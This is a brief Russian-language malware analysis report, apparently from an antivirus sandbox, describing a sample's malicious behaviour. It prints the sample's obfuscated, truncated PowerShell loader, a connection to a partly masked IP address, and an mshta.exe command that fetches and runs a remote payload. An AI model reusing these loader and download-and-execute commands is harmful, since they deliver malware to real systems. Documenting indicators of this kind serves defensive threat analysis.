Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $AWGDGPVZLHSXFBKPTGXCLK = '[S5_04@4%&{8/$}*)#5^}+74EM.I58$<71[\\[0[<7&=)##[/-MREAdER]'.Replace('5_04@4%&{8/$}*)#5^}+74','ySt').Replace('58$<71[\\[0[<7&=)##[/-','O.StREA');$RZUQKHIHXRQGDOCENJSPE...
Сетевая активность
Подключается к
- '15#.#4.159.135':80
TCP
Запросы HTTP GET
- http://15#.#4.159.135/macro_new/ENC3245678798.txt
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $AWGDGPVZLHSXFBKPTGXCLK = '[S5_04@4%&{8/$}*)#5^}+74EM.I58$<71[\\[0[<7&=)##[/-MREAdER]'.Replace('5_04@4%&{8/$}*)#5^}+74','ySt').Replace('58$<71[\\[0[<7&=)##[/-','O.StREA');$RZUQKHIHXRQGDOCENJSPE...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\mshta.exe' http://15#.#4.159.135/macro_new/ENC3245678798.txt
